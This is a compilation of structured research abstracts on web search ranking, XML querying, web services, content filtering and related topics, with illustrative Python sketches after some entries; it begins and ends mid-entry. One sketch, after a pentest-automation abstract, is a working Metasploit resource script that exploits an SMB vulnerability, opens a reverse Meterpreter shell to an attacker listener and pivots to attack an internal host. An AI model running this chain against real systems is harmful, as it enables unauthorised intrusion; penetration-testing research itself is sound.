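def topic_relevance(adjacency, seed_pages, xi=0.85, iterations=100):
    A = np.asarray(adjacency, dtype=float)
    n = A.shape[0]
    out_deg = A.sum(axis=1, keepdims=True)
    M = np.divide(A, out_deg, out=np.zeros_like(A), where=out_deg > 0)  # row-stochastic
    seed = np.zeros(n)
    seed[list(seed_pages)] = 1.0 / len(seed_pages)
    r = seed.copy()
    for _ in range(iterations):
        r = xi * M.T @ r + (1 - xi) * seed
    return r

links = [[0, 1, 1, 0],
         [0, 0, 1, 0],
         [1, 0, 0, 1],
         [0, 0, 1, 0]]
print(np.round(topic_relevance(links, seed_pages={0}), 3))
```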
Findings
The paper finds that this approach exhibits desirable properties such as fast convergence and stability, and yields relevant answer sets. The first property is shown using theoretical proofs, while the others are evaluated through stability experiments and assessments of real‐world data in comparison with already established algorithms.
Research limitations/implications
In the assessment, all pages that a web spider was able to find in the Nordic countries were used. It is also important to note that entities that use domains outside the Nordic countries (e.g. .com or .org) are not present in the paper's datasets even though they reside logically within one or more of the Nordic countries. This is quite a large dataset, but still small in comparison with the entire world wide web. Moreover, the execution speed of some of the algorithms unfortunately prohibited the use of a large test dataset in the stability tests.
Practical implications
It is not only possible, but also reasonable, to perform ranking of web pages without using Markov chain approaches. This means that the work of generating answer sets for complex questions could (at least in theory) be divided into smaller parts that are later summed up to give the final answer.
Originality/value
This paper contributes to the research on internet search engines.
Purpose
– Distributed data streams are an important topic of current research. In such a setting, data values will be missed, e.g. due to network errors. This paper aims to allow this incompleteness to be detected and overcome with either the user not being affected or the effects of the incompleteness being reported to the user.
Design/methodology/approach
– A model for representing the incomplete information has been developed that captures the information that is known about the missing data. Techniques for query answering involving certain and possible answer sets have been extended so that queries over incomplete data stream histories can be answered.
Findings
– It is possible to detect when a distributed data stream is missing one or more values. When such data values are missing there will be some information that is known about the data and this is stored in an appropriate format. Even when the available data are incomplete, it is possible in some circumstances to answer a query completely. When this is not possible, additional meta-data can be returned to inform the user of the effects of the incompleteness.
Research limitations/implications
– The techniques and models proposed in this paper have only been partially implemented.
Practical implications
– The proposed system is general and can be applied wherever there is a need to query the history of distributed data streams. The work in this paper enables the system to answer queries when there are missing values in the data.
Originality/value
– This paper presents a general model of how to detect, represent, and answer historical queries over incomplete distributed data streams.
Purpose
The semantic and structural heterogeneity of large Extensible Markup Language (XML) digital libraries emphasizes the need of supporting approximate queries, i.e. queries where the matching conditions are relaxed so as to retrieve results that possibly partially satisfy the user's requests. The paper aims to propose a flexible query answering framework which efficiently supports complex approximate queries on XML data.
Design/methodology/approach
To reduce the number of relaxations applicable to a query, the paper relies on the specification of user preferences about the types of approximations allowed. A specifically devised index structure which efficiently supports both semantic and structural approximations, according to the specified user preferences, is proposed. Also, a ranking model to quantify approximations in the results is presented.
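The ranking model is not detailed in the abstract; as an illustration of the general idea, the sketch below assigns each relaxation type a penalty and lets user preferences decide which relaxations are allowed. Penalty values and preference fields are assumptions:

```python
# Illustrative ranking of approximate answers: each relaxation applied to the
# query (e.g. a semantic substitution of a tag name or a structural change)
# carries a penalty, and the user's preferences decide which relaxation types
# are allowed and how much they cost. Penalty values are assumptions.

PENALTIES = {"semantic": 0.2, "structural": 0.4}

def answer_score(approximations, user_prefs):
    """approximations: list of relaxation types applied to obtain the answer."""
    score = 1.0
    for kind in approximations:
        if kind not in user_prefs["allowed"]:
            return 0.0                     # this relaxation was ruled out by the user
        score *= 1.0 - PENALTIES[kind] * user_prefs.get("weight", 1.0)
    return score

prefs = {"allowed": {"semantic", "structural"}, "weight": 1.0}
answers = [("exact match", []), ("tag synonym", ["semantic"]),
           ("synonym + moved element", ["semantic", "structural"])]
for label, approx in sorted(answers, key=lambda a: answer_score(a[1], prefs), reverse=True):
    print(label, round(answer_score(approx, prefs), 2))
```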
Findings
Personalized queries, on the one hand, effectively narrow the space of query reformulations and, on the other hand, enhance the user's query capabilities with a great deal of flexibility and control over requests. As to the quality of results, the retrieval process benefits considerably from the presence of user preferences in the queries. Experiments demonstrate the effectiveness and the efficiency of the proposal, as well as its scalability.
Research limitations/implications
Future developments concern the evaluation of the effectiveness of personalization on queries through additional examinations of the effects of the variability of parameters expressing user preferences.
Originality/value
The paper is intended for the research community and proposes a novel query model which incorporates user preferences about query relaxations on large heterogeneous XML data collections.
Purpose
The purpose of this paper is to provide a feature‐based characterization of version control systems (VCSs), providing an overview about the state‐of‐the‐art of versioning systems dedicated to modeling artifacts.
Design/methodology/approach
Based on a literature study of existing approaches, a description of the features of versioning systems is established. Special focus is set on three‐way merging which is an integral component of optimistic versioning. This characterization is employed on current model versioning systems, which allows the derivation of challenges in this research area.
Findings
The results of the evaluation show that several challenges need to be addressed in future developments of VCSs and merging tools in order to allow the parallel development of model artifacts.
Practical implications
Making model‐driven engineering (MDE) a success requires supporting the parallel development of model artifacts as is done nowadays for text‐based artifacts. Therefore, model versioning capabilities are a must for leveraging MDE in practice.
Originality/value
The paper gives a comprehensive overview of collaboration features of VCSs for software engineering artifacts in general, discusses the state‐of‐the‐art of systems for model artifacts, and finally lists urgent challenges which have to be considered in future model versioning systems for realizing MDE in practice.
Purpose
TV is changing in several dimensions concurrently: from analogue to digital, from scheduled broadcasts to on‐demand TV on the internet, from a lean‐back (passive) to a lean‐forward (active) medium, from straight watching to the consumption of content connected to additional services, from the sole TV viewer to the viewer being part of social networks and communities related to the TV content, etc. The purpose of this paper is to demonstrate the adaptation of the design and realization of TV program formats to the changes that are happening to television. In addition, the paper would like to find out how to support the design of interactions, dynamic narrations and content types, as well as the role of the internet within these processes and this application area.
Design/methodology/approach
Currently, there exist many approaches towards the development of social, collaborative, and interactive TV program formats and systems. Within the scope of this paper, the authors present the latest case studies and example program formats for each case. The paper examines them concerning their interaction possibilities and architecture, as well as the influence and utilization of the web. Finally, the paper provides a simple categorization according to the narration character, content, and interactivity types of the listed TV program formats.
Findings
Owing to the collaborative and interactive character of the web, a strong influence of the web on the hardware‐ and content‐side development of TV is discovered. Nevertheless, the web's potential is far from exploited in this area, neither to make the narration more dynamic, nor to enrich the content types or the interactivity. Finally, the paper identifies a high level of effort, occurrence and development in interactivity, in contrast to the narration characteristics and content types.
Research limitations/implications
Only one representative example TV program format enabling viewer interaction has been chosen for each case in the paper. The authors make no claim to completeness in covering all genres, possibilities of interaction or TV program formats existing in the field of interactive/social/collaborative TV.
Originality/value
This paper presents an extension of a previous paper presented at the MoMM2009.
Purpose
– The purpose of this paper is to describe the development of a system called Mubser to translate Arabic and English Braille into normal text. The system can automatically detect the source language and the Braille grade.
Design/methodology/approach
– The Mubser system was designed under the MS-Windows environment and implemented using Visual C# 2.0 with an Arabic interface. The system uses the concept of a rule file to translate supported languages from Braille to text. The rule file is based on the XML format. The identification of the source language and grade is based on a statistical approach.
Findings
– From the literature review, the authors found that most research and products do not support bilingual translation from Braille to text in either contracted or un-contracted Braille. The Mubser system is a robust system that fills that gap. It helps both visually impaired and sighted people, especially Arabic native speakers, to translate from Braille to text.
Research limitations/implications
– Mubser is being implemented and tested by the authors for both the Arabic and English languages. The tests performed so far have shown excellent results. In the future, it is planned to integrate the system with an optical Braille recognition system, enhance the system to accept new languages, support maths and scientific symbols, and add spell checkers.
Practical implications
– There is a desperate need for such a system to translate Braille into normal text. This system helps both sighted and blind people to communicate better.
Originality/value
– This paper presents a novel system for converting Braille codes (Arabic and English) into normal text.
Purpose
With the rapid emergence and explosion of the internet and the trend of globalization, a tremendous number of textual documents written in different languages are electronically accessible online from the world wide web. Efficiently and effectively managing these documents written in different languages is important to organizations and individuals. Therefore, the purpose of this paper is to propose letter frequency neural networks to enhance the performance of language identification.
Design/methodology/approach
Initially, the paper analyzes the feasibility of using a windowing algorithm in order to find the best method for selecting features for Arabic script document language identification using backpropagation neural networks. Previously, it had been found that the sliding window and non‐sliding window algorithms used as feature selection methods in the experiments did not yield good results. Therefore, this paper proposes language identification of Arabic script documents based on letter frequency using a backpropagation neural network, and uses datasets of Arabic, Persian, Urdu and Pashto language documents, which are all written in Arabic script.
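A minimal sketch of letter‐frequency language identification with a backpropagation‐trained network, using scikit‐learn's MLPClassifier and toy transliterated strings in place of real Arabic‐script documents:

```python
# Sketch of letter-frequency language identification with a backpropagation
# network (scikit-learn's MLPClassifier). The toy transliterated strings stand
# in for real Arabic-script documents in Arabic, Persian, Urdu and Pashto.
from collections import Counter
from sklearn.neural_network import MLPClassifier

def letter_frequencies(text, alphabet):
    counts = Counter(ch for ch in text if ch in alphabet)
    total = sum(counts.values()) or 1
    return [counts[ch] / total for ch in alphabet]

docs = [("gol o bolbol dar bagh", "persian"),
        ("ketab ra khandam", "persian"),
        ("alkitab fi albayt", "arabic"),
        ("qaraa alwalad aldars", "arabic")]

alphabet = sorted({ch for text, _ in docs for ch in text if ch != " "})
X = [letter_frequencies(text, alphabet) for text, _ in docs]
y = [lang for _, lang in docs]

clf = MLPClassifier(hidden_layer_sizes=(16,), max_iter=2000, random_state=0).fit(X, y)
print(clf.predict([letter_frequencies("bagh o bolbol", alphabet)]))
```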
Findings
The experiments have shown that the average root mean squared error of Arabic script document language identification based on letter frequency feature selection algorithm is lower than the windowing algorithm.
Originality/value
This paper highlights the fact that using neural networks with proper feature selection methods will increase the performance of language identification.
Purpose
Today the amount of all kinds of digital data (e.g. documents and e‐mails), existing on every user's computer, is continuously growing. Users are faced with huge difficulties when it comes to handling the existing data pool and finding specific information, respectively. This paper aims to discover new ways of searching and finding semi‐structured data by integrating semantic metadata.
Design/methodology/approach
The proposed architecture allows cross‐border searches spanning various applications and operating system activities (e.g. file access and network traffic) and improves the human working process by offering context‐specific, automatically generated links that are created using ontologies.
Findings
The proposed semantic enrichment of automatically gathered data is a useful approach to reflect the human way of thinking, which relies on remembering relations rather than keywords or tags. The proposed architecture supports the human working process by managing and enriching personal data, e.g. by providing a database model which supports the semantic storage idea through a generic and flexible structure, and through the modular structure and composition of data collectors.
Originality/value
Available programs to manage personal data usually offer searches either via keywords or full text search. Each of these existing search methodologies has its shortcomings and, apart from that, people tend to forget names of specific objects. It is often easier to remember the context of a situation in which, for example, a file was created or a web site was visited. By proposing this architectural approach for handling semi‐structured data, it is possible to offer a sophisticated and more applicable search mechanism regarding the way of human thinking.
Purpose
Embedded technologies are one of the fastest growing sectors in information technology today and they are still open fields with many business opportunities. Hardly any new product reaches the market without embedded systems components any more. However, the main technical challenges include the design and integration, as well as providing the necessary degree of security in an embedded system. This paper aims to focus on a new processor architecture introduced to face security issues.
Design/methodology/approach
In the short term, the main idea of this paper focuses on the implementation of a method for the improvement of code security through measures in hardware that can be transparent to software developers. It was decided to develop a processor core extension that provides improved protection against software vulnerabilities and passively improves the security of target systems. The architecture directly executes bound checking in hardware without performance loss, whereas checking in software would make any application intolerably slow.
Findings
Simulation results demonstrated that the proposed design offers a higher performance and security, when compared with other solutions. For the implementation of the Secure CPU, the SPARC V8‐based LEON 2 processor from Gaisler Research was used. The processor core was adapted and finally synthesised for a GR‐XC3S‐1500 board and extended.
Originality/value
Numerically, most systems run on dedicated hardware and not on high‐performance general purpose processors, so there certainly exists a market even for new hardware to be used in real applications. Thus, the experience from the related project work can lead to valuable and marketable results for businesses and academics.
Despite several efforts in recent years, the web model and semantic web technologies have not yet been successfully applied to empower Ubiquitous Computing architectures in order to create knowledge-rich environments populated by interconnected smart devices. In this paper, we point out some problems of these previous initiatives and introduce SoaM (Smart Objects Awareness and Adaptation Model), an architecture for designing and seamlessly deploying web-powered context-aware semantic gadgets. Implementation and evaluation details of SoaM are also provided in order to identify future research challenges.
Purpose
Tens of thousands of news articles are posted online each day, covering topics from politics to science to current events. To better cope with this overwhelming volume of information, RSS (news) feeds are used to categorize newly posted articles. Nonetheless, most RSS users must filter through many articles within the same or different RSS feeds to locate articles pertaining to their particular interests. Due to the large number of news articles in individual RSS feeds, there is a need for further organizing articles to aid users in locating non‐redundant, informative, and related articles of interest quickly. This paper aims to address these issues.
Design/methodology/approach
The paper presents a novel approach which uses the word‐correlation factors in a fuzzy set information retrieval model to: filter out redundant news articles from RSS feeds; shed less‐informative articles from the non‐redundant ones; and cluster the remaining informative articles according to the fuzzy equivalence classes on the news articles.
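A rough sketch of that pipeline is shown below; simple word‐overlap scores stand in for the word‐correlation factors, and a similarity threshold with connected components stands in for the fuzzy equivalence classes, so it is only an approximation of the described approach:

```python
# Rough sketch of the pipeline: compute pairwise article similarities, drop
# near-duplicates, and group the rest by thresholding the similarity (a crude
# stand-in for word-correlation factors and fuzzy equivalence classes).
from itertools import combinations

def similarity(a, b):
    wa, wb = set(a.lower().split()), set(b.lower().split())
    return len(wa & wb) / len(wa | wb) if wa | wb else 0.0

def cluster(articles, redundant=0.9, related=0.3):
    kept = []
    for art in articles:                       # filter redundant articles
        if all(similarity(art, k) < redundant for k in kept):
            kept.append(art)
    parent = list(range(len(kept)))            # union-find over related pairs
    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i
    for i, j in combinations(range(len(kept)), 2):
        if similarity(kept[i], kept[j]) >= related:
            parent[find(i)] = find(j)
    groups = {}
    for i, art in enumerate(kept):
        groups.setdefault(find(i), []).append(art)
    return list(groups.values())

feed = ["Team wins championship final",
        "Team wins the championship final match",
        "New budget announced by parliament",
        "Parliament passes new budget plan"]
print(cluster(feed))
```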
Findings
The clustering approach requires little overhead or computational costs, and experimental results have shown that it outperforms other existing, well‐known clustering approaches.
Research limitations/implications
The clustering approach as proposed in this paper applies only to RSS news articles; however, it can be extended to other application domains.
Originality/value
The developed clustering tool is highly efficient and effective in filtering and classifying RSS news articles and does not employ any labor‐intensive user‐feedback strategy. Therefore, it can be implemented in real‐world RSS feeds to aid users in locating RSS news articles of interest.
Modern information systems are increasingly built on Web-based and component-based platforms. This raises the need for a service-oriented infrastructure to simplify the management and procurement of the corresponding components. Special focus lies on the deployment and distribution of such software artifacts within the context of the World Wide Web to promote their reuse and therefore to save development costs. At the same time, the integrity of the overall system must not be neglected. The use of components from third-party vendors poses a potential security threat requiring additional care. Furthermore, the issue of usage rights for the components and the data they provide remains. Flexible mechanisms can offer a huge range of different licensing models to be enforced on the runtime process. This paper presents an approach to deal with these challenges together with an implementation of a software system supporting component-based Web portals.
Purpose
– WS‐ReliableMessaging specification describes a protocol that allows messages to be delivered reliably between distributed applications in the presence of software component, system, or network failures. However, it ensures reliable communication only in the context of two sites – it does not provide any means for consistent termination of the executions spanning over more than two sites. This paper aims to address this issue.
Design/methodology/approach
– The paper presents the Reliable WS‐AtomicTransaction protocol, and illustrates its implementation by exploiting WS‐Coordination, which describes an extensible framework for providing protocols that coordinate the actions of distributed applications. The paper also presents the ontology of the log, which is maintained by the Reliable WS‐AtomicTransaction protocol. The ontology is presented in a graphical form and in OWL.
Findings
– The introduction of an atomic commitment protocol and its termination protocol increase the reliability of the executions of distributed applications in service‐oriented architectures. On the other hand, it complicates the management of distributed applications as the atomic commitment protocol has to maintain the log that is used by its termination protocol.
Originality/value
– The paper presents an atomic commitment protocol and its termination protocol, which is failure resilient and non‐blocking as long as a failed site can communicate with a process that has received sufficient information to know whether the transaction will be committed or aborted. Decreasing the amount of blockings is important because blocking can cause processes to wait for an arbitrarily long period of time.
In the last few years, a number of highly publicized incidents of Distributed Denial of Service (DDoS) attacks against high-profile government and commercial websites have made people aware of the importance of providing data and services security to users. A DDoS attack is an availability attack, which is characterized by an explicit attempt from an attacker to prevent legitimate users of a service from using the desired resources. This paper introduces the vulnerability of web applications to DDoS attacks, and presents an active distributed defense system that has a deployment mixture of sub-systems to protect web applications from DDoS attacks. According to the simulation experiments, this system is effective in that it is able to defend web applications against attacks. It can avoid overall network congestion and provide more resources to legitimate web users.
Purpose
This paper aims to report work on achieving semantic interoperability in electronic auctions. In particular, it considers the advantages and drawbacks of using hard‐coding and using semantic messages in the communication between the auction system and the participants of the auction.
Design/methodology/approach
It is demonstrated that although XML documents are commonly used for information exchange, they do not provide any means of talking about the semantics (i.e. meaning) of the data. It is also shown that by expressing exchanged documents in the resource description framework (RDF), the semantics of the messages can be captured in the message itself.
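As an illustration of the second point, a bid message expressed as RDF (using rdflib and a made‐up vocabulary URI) carries its own semantics rather than relying on a hard‐coded document layout:

```python
# Sketch of expressing a bid message as RDF instead of a hard-coded XML
# layout, so that the meaning of each field travels with the message itself.
# The vocabulary URI is made up for the example.
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import RDF, XSD

AUCTION = Namespace("http://example.org/auction#")

g = Graph()
bid = URIRef("http://example.org/auction/bid/42")
g.add((bid, RDF.type, AUCTION.Bid))
g.add((bid, AUCTION.onItem, URIRef("http://example.org/auction/item/17")))
g.add((bid, AUCTION.bidder, Literal("agent-007")))
g.add((bid, AUCTION.amount, Literal("125.50", datatype=XSD.decimal)))

print(g.serialize(format="turtle"))
```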
Findings
It is recognized that hard‐coding is proven to be a valuable and powerful way for an exchange of structured and persistent business documents (messages). However, if we use hard‐coding in the case of non‐persistent documents and non‐static markets we will encounter problems in deploying new auction policies and extending the system by new participants.
Practical implications
The introduction of the RDF‐technology in message exchange is challenging as it incorporates Semantic web technologies into many parts of the auction system, e.g. on data stores and query languages. The introduction of this technology is also an investment. The investment on new Semantic web technology includes a variety of costs including software, hardware and training costs.
Originality/value
By automating electronic auctions both buyers and sellers can benefit as they can achieve cost reductions and shorten the duration of the auction processes. Also new auction formats can be easily deployed.
Purpose
– This paper aims to address formal testing of real‐time systems by providing readers with guidance for generating test cases from timed automata.
Design/methodology/approach
– In this paper, a set of test selection criteria is presented. Such criteria are useful for testing real‐time systems specified by timed automata. The criteria are introduced after the presentation of timed automata model and the concepts related to it.
Findings
– The paper finds that the set of test selection criteria is ordered based on the inclusion relation. The ordering is useful for developing new testing methods and for comparing existing approaches.
Originality/value
– Each of the proposed test selection criteria can be used to develop a new method for testing timed automata with certain fault coverage.
Purpose
The growth of the web and the increasing number of documents available electronically have been paralleled by the emergence of harmful web page content such as pornography, violence, racism, etc. This emergence has made it necessary to provide filtering systems designed to secure internet access. Most of them mainly process adult content and focus on blocking pornography, marginalizing violence. The purpose of this paper is to propose a violent web content detection and filtering system, which uses textual and structural content‐based analysis.
Design/methodology/approach
The violent web content detection and filtering system uses textual and structural content‐based analysis based on a violent keyword dictionary. The paper focuses on the keyword dictionary preparation, and presents a comparative study of different data mining techniques to block violent content web pages.
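A minimal sketch of the classification step, assuming a tiny made‐up keyword dictionary, hand‐crafted textual/structural features and scikit‐learn's decision tree (the paper compares several decision tree building algorithms on real features):

```python
# Sketch of the classification step: turn each page into keyword-dictionary
# and structural features, then train a decision tree to separate violent
# from harmless pages. Features and the tiny training set are made up.
from sklearn.tree import DecisionTreeClassifier

VIOLENT_KEYWORDS = {"weapon", "kill", "blood", "fight"}

def features(page):
    words = page["text"].lower().split()
    hits = sum(1 for w in words if w in VIOLENT_KEYWORDS)
    return [
        hits / max(len(words), 1),          # density of dictionary keywords in the text
        page["title_hits"],                 # dictionary keywords in title/meta tags (structural)
        page["image_count"],                # structural feature: number of images
    ]

train_pages = [
    {"text": "weapon fight blood scene", "title_hits": 2, "image_count": 12, "label": 1},
    {"text": "gardening tips for spring", "title_hits": 0, "image_count": 3, "label": 0},
    {"text": "kill count in the latest fight video", "title_hits": 1, "image_count": 9, "label": 1},
    {"text": "recipe for vegetable soup", "title_hits": 0, "image_count": 5, "label": 0},
]
X = [features(p) for p in train_pages]
y = [p["label"] for p in train_pages]

clf = DecisionTreeClassifier(max_depth=3, random_state=0).fit(X, y)
test = {"text": "blood and weapon in street fight", "title_hits": 1, "image_count": 7}
print(clf.predict([features(test)]))
```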
Findings
The solution presented in this paper showed its effectiveness by scoring an 89 per cent classification accuracy rate on its test data set.
Research limitations/implications
Many future work directions can be considered. This paper analyzed only the textual and structural content of web pages, and an additional analysis of the visual content is one direction for future work. Future research is also underway to develop effective filtering tools for other types of harmful web pages, such as racist content.
Originality/value
The paper's major contributions are, first, the study and comparison of several decision tree building algorithms to build a violent web classifier based on a textual and structural content‐based analysis for improving web filtering; and second, easing the laborious dictionary building by automatically finding discriminative indicative keywords.
Purpose
The definition of modeling languages is a key‐prerequisite for model‐driven engineering. In this respect, Domain‐Specific Modeling Languages (DSMLs) defined from scratch in terms of metamodels and the extension of Unified Modeling Language (UML) by profiles are the proposed options. For interoperability reasons, however, the need arises to bridge modeling languages originally defined as DSMLs to UML. Therefore, the paper aims to propose a semi‐automatic approach for bridging DSMLs and UML by employing model‐driven techniques.
Design/methodology/approach
The paper discusses problems of the ad hoc integration of DSMLs and UML and from this discussion a systematic and semi‐automatic integration approach consisting of two phases is derived. In the first phase, the correspondences between the modeling concepts of the DSML and UML are defined manually. In the second phase, these correspondences are used for automatically producing UML profiles to represent the domain‐specific modeling concepts in UML and model transformations for transforming DSML models to UML models and vice versa. The paper presents the ideas within a case study for bridging ComputerAssociate's DSML of the AllFusion Gen CASE tool with IBM's Rational Software Modeler for UML.
Findings
The ad hoc definition of UML profiles and model transformations for achieving interoperability is typically a tedious and error‐prone task. By employing a semi‐automatic approach one gains several advantages. First, the integrator only has to deal with the correspondences between the DSML and UML on a conceptual level. Second, all repetitive integration tasks are automated by using model transformations. Third, well‐defined guidelines support the systematic and comprehensible integration.
Research limitations/implications
The paper focuses on the integration direction from DSMLs to UML, but not on how to derive a DSML defined in terms of a metamodel from a UML profile.
Originality/value
Although DSMLs defined as metamodels and UML profiles are frequently applied in practice, only a few attempts have been made to provide interoperability between these two worlds. The contribution of this paper is to integrate the so far competing worlds of DSMLs and UML by proposing a semi-automatic approach, which allows models to be exchanged between these two worlds without loss of information.
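As a rough illustration of the two-phase idea, the sketch below assumes a deliberately simplified representation of the correspondences and models involved; the concept names and data structures are our own and do not reflect the paper's tooling. Phase one records manual correspondences between DSML concepts and UML metaclasses; phase two derives stereotype definitions for a UML profile and a trivial model-to-model transformation from them.

```python
# Phase 1: manually defined correspondences (DSML concept -> UML base metaclass).
CORRESPONDENCES = {
    "BusinessEntity": "Class",
    "EntityAttribute": "Property",
    "EntityLink": "Association",
}

# Phase 2a: generate a profile as a list of stereotype definitions.
def generate_profile(correspondences: dict[str, str]) -> list[dict]:
    return [{"stereotype": dsml, "extends": uml} for dsml, uml in correspondences.items()]

# Phase 2b: transform a DSML model element into a stereotyped UML element.
def transform(element: dict) -> dict:
    uml_type = CORRESPONDENCES[element["type"]]
    return {"type": uml_type, "name": element["name"], "appliedStereotype": element["type"]}

print(generate_profile(CORRESPONDENCES))
print(transform({"type": "BusinessEntity", "name": "Customer"}))
```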
Pentesting is becoming an important activity even for smaller companies. One of the most important economic pressures is the cost of such tests. In order to automate pentests, tools such as Metasploit can be used. Post-exploitation activities, however, cannot be automated easily. Our contribution is to extend Meterpreter scripts so that post-exploitation can be scripted. Moreover, using a multi-step approach (pivoting), we can automatically exploit machines that are not directly routable: once the first machine is exploited, the script continues by automatically launching an attack on the next machine, and so on.
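As an illustration of how such a chain might be driven non-interactively, the sketch below generates a Metasploit resource script that exploits a first host, adds a route through the resulting session (the pivot), and then attacks a host on the internal subnet. The module names, addresses, and subnets are placeholders, and this is not the authors' Meterpreter-script extension.

```python
import subprocess
import tempfile

FIRST_TARGET = "192.0.2.10"        # placeholder address of the first, directly reachable host
INTERNAL_SUBNET = "10.10.10.0"     # placeholder subnet reachable only through the first host
ATTACKER_IP = "192.0.2.1"          # placeholder listener address

# Build an msfconsole resource script: exploit the first host, add a route through
# the resulting session (pivoting), then attack a host behind it. In a real run one
# would wait for the first session to be established before adding the route.
resource = f"""
use exploit/windows/smb/ms08_067_netapi
set RHOSTS {FIRST_TARGET}
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST {ATTACKER_IP}
exploit -j -z
route add {INTERNAL_SUBNET} 255.255.255.0 1
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.20
set PAYLOAD windows/meterpreter/bind_tcp
exploit -j -z
"""

with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as f:
    f.write(resource)
    rc_path = f.name

# msfconsole's -r flag executes the resource script without user interaction.
subprocess.run(["msfconsole", "-q", "-r", rc_path])
```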
Purpose
In any critical system, high-availability of software components such as web services has so far been achieved through replication. Three replication strategies, known as active, passive, and hybrid, describe, for example, how many replicas are needed, where to locate replicas, and how replicas interact with the original web service and among themselves if needed. The purpose of this paper is to show how replicas could be substituted with components that are similarly functional to the component that needs back-up in case of failure.
Design/methodology/approach
After examination of the different existing replication strategies, it was decided to test the suitability of the proposed web services high‐availability approach based on communities for each strategy. To this end, the specification of web services using two behaviors, namely control and operational, was deemed appropriate.
Findings
The active replication strategy is the only strategy that could support the development of a web services high‐availability approach based on communities of web services.
Practical implications
The proposed approach has been validated in practice by deploying a JXTA‐based testbed. The experimental work has implemented the active replication strategy.
Originality/value
Software component high-availability could be achieved by components that are similarly functional to the component requiring back-up, which permits the common limitations of existing replication strategies to be addressed.
Purpose
This survey aims to study and analyze current techniques and methods for context-aware web service systems, to discuss future trends, and to propose further steps towards making web service systems context-aware.
Design/methodology/approach
The paper analyzes and compares existing context‐aware web service‐based systems based on techniques they support, such as context information modeling, context sensing, distribution, security and privacy, and adaptation techniques. Existing systems are also examined in terms of application domains, system type, mobility support, multi‐organization support and level of web services implementation.
Findings
Support for context-aware web service-based systems is increasing. It is hard to find a truly context-aware web service-based system that is interoperable and secure, and that operates in multi-organizational environments. Various issues, such as distributed context management, context-aware service modeling and engineering, context reasoning and quality of context, and security and privacy, have not been well addressed.
Research limitations/implications
The number of systems analyzed is limited. Furthermore, the survey is based on published papers; therefore, up-to-date information and developments might not be taken into account.
Originality/value
Existing surveys do not focus on context-awareness techniques for web services. This paper helps to understand the state of the art in context-aware techniques for web services that can be employed in the future of services, which will be built around, amongst other things, mobile devices, web services, and pervasive environments.
Purpose
In the last decade, web services have become a major technology for implementing loosely coupled business processes and performing application integration. Through the use of context, a new generation of web services, namely context-aware web services (CASs), is currently emerging as an important technology for building innovative context-aware applications. Unfortunately, CASs are still difficult to build. Issues such as the lack of a context provisioning management approach and the lack of a generic approach for formalizing the development process need to be solved first to enable easy and effective development of CASs. The purpose of this paper is to investigate techniques for developing CASs.
Design/methodology/approach
The paper focuses on introducing a model-driven platform, called ContextServ, and showcasing how to use this platform to rapidly develop a context-aware web application, Smart Adelaide Guide. ContextServ adopts a model-driven development (MDD) approach in which a Unified Modeling Language (UML)-based modeling language, ContextUML, is used to model web services and their context-awareness features.
Findings
The paper presents novel techniques for efficient and effective development of CASs using a MDD approach. The ContextServ platform is the only one that provides a comprehensive software toolset that supports graphical modeling and automatic model transformation of CASs.
Practical implications
The proposed approach has been validated in practice by developing various CASs. The experimental study demonstrates the efficiency and effectiveness of the approach.
Originality/value
The paper presents a novel platform called ContextServ, which offers a set of visual editing and automation tools for easy and fast generation and deployment of CASs.
Prior to conducting business via the web, business partners agree on the business processes they are able to support. In ebXML, the choreography of these business processes is described as an instance of the so-called business process specification schema (BPSS). For execution purposes, the BPSS must be defined in the exact business context of the partnership. Reference models for B2B processes developed by standards organizations usually span multiple business contexts to avoid a multitude of similar processes. In this paper we present how business collaboration models following the UN/CEFACT Modeling Methodology (UMM) are expressed in ebXML BPSS. To allow a mapping from multi-context business collaboration models to a context-specific choreography in ebXML BPSS, we extend UMM to capture constraints for different business contexts.
Purpose
– Tree pattern is at the core of XML queries. The tree patterns in XML queries typically contain redundancies, especially when broad integrity constraints (ICs) are present and considered. Tree pattern minimization therefore has great significance for efficient XML query processing. Although various minimization schemes/algorithms have been proposed, none of them can exploit broad ICs to thoroughly minimize the tree patterns in XML queries. The purpose of this research is to develop an innovative minimization scheme and provide a novel implementation algorithm.
Design/methodology/approach
– Query augmentation/expansion was taken as a necessary first step by most prior approaches to achieve XML query pattern minimization in the presence of certain ICs. The adopted augmentation/expansion is also the source of the typical O(n^4) time complexity of the proposed algorithms. This paper presents an innovative approach called allying to effectively circumvent the otherwise necessary augmentation step and to keep the time complexity of the implementation algorithm optimal, i.e. O(n^2). Meanwhile, the graph simulation concept is adapted and generalized to a three-tier definition scheme so that broader ICs are incorporated.
Findings
– The innovative allying minimization approach is identified and an effective implementation algorithm named AlliedMinimize is developed. This algorithm is both runtime optimal, taking O(n^2) time, and the most powerful in terms of the broadness of constraints it can exploit for XML query pattern minimization. An experimental study confirms the validity of the proposed approach and algorithm.
Research limitations/implications
– Though the algorithm AlliedMinimize is so far the most powerful XML query pattern minimization algorithm, it does not incorporate all potential ICs existing in the context of XML. Effectively integrating this innovative minimization scheme into a fully-fledged XML query optimizer remains to be investigated in the future.
Practical implications
– In practice, allying and AlliedMinimize can be used to achieve quick optimization of XML queries via fast minimization of the tree patterns involved, under broad ICs.
Originality/value
– This paper presents a novel scheme and an efficient algorithm for XML query pattern minimization under broad ICs.
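The toy sketch below conveys only the basic intuition behind IC-driven tree pattern minimization: a leaf branch of the query pattern that an integrity constraint guarantees to exist in every conforming document adds no selectivity and can be pruned. It is not the AlliedMinimize algorithm, and the node labels and constraints are invented.

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class PatternNode:
    label: str
    is_output: bool = False          # nodes returned by the query must be kept
    children: List["PatternNode"] = field(default_factory=list)

# IC set: each (parent, child) pair is guaranteed to hold in every document.
REQUIRED_CHILD = {("book", "title"), ("book", "isbn")}

def minimize(node: PatternNode) -> PatternNode:
    kept = []
    for child in (minimize(c) for c in node.children):
        redundant = (
            not child.children                                # child is a bare leaf test
            and not child.is_output                           # and is not part of the result
            and (node.label, child.label) in REQUIRED_CHILD   # and is implied by an IC
        )
        if not redundant:
            kept.append(child)
    node.children = kept
    return node

# //book[title][isbn]/author -> the [title] and [isbn] tests are implied by the ICs.
query = PatternNode("book", children=[
    PatternNode("title"),
    PatternNode("isbn"),
    PatternNode("author", is_output=True),
])
minimize(query)
print([c.label for c in query.children])   # ['author']
```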
Purpose
